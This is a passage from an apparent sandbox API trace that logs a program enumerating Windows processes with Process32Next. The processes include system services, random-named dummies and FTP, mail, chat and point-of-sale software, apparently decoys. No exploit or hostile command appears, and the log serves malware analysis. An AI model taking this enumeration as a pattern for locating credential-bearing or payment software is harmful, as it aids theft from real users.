cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.196] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.198] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.250] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.254] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0258.260] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0258.265] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.266] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.267] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0258.269] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0258.270] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0258.272] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.273] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.331] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0258.334] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.337] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.339] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0258.341] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0258.393] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0258.394] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0258.396] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0258.397] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0258.399] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0258.401] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0258.405] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0258.406] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0258.408] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0258.409] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0258.411] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0258.412] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0258.414] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0258.416] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0258.418] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0258.422] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0258.423] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0258.426] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0258.427] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0258.429] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0258.430] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0258.432] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0258.433] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0258.540] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0258.542] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0258.547] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0258.549] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0258.551] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0258.552] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0258.554] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0258.556] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0258.558] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0258.563] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0258.564] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0258.566] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0258.568] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0258.569] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0258.571] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0258.573] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0258.574] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0258.662] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0258.663] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0258.665] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0258.667] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0258.673] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0258.675] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0258.677] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0258.679] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0258.681] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0258.683] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0258.688] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0258.689] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0258.691] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0258.692] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0258.694] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0258.696] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0258.697] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0258.707] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0258.709] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0258.710] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0258.712] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0258.714] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.718] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.719] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0258.721] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: 